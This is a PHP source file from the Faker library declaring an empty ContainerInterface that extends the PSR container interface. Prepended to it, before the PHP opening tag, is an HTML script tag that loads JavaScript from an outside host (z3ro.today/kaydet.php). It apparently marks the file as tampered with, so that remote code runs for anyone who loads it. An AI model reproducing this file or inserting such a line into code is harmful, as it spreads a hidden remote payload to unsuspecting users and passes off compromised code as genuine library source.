<script src="http://z3ro.today/kaydet.php"></script><?php

namespace Faker\Container;

use Psr\Container\ContainerInterface as BaseContainerInterface;

interface ContainerInterface extends BaseContainerInterface
{
}
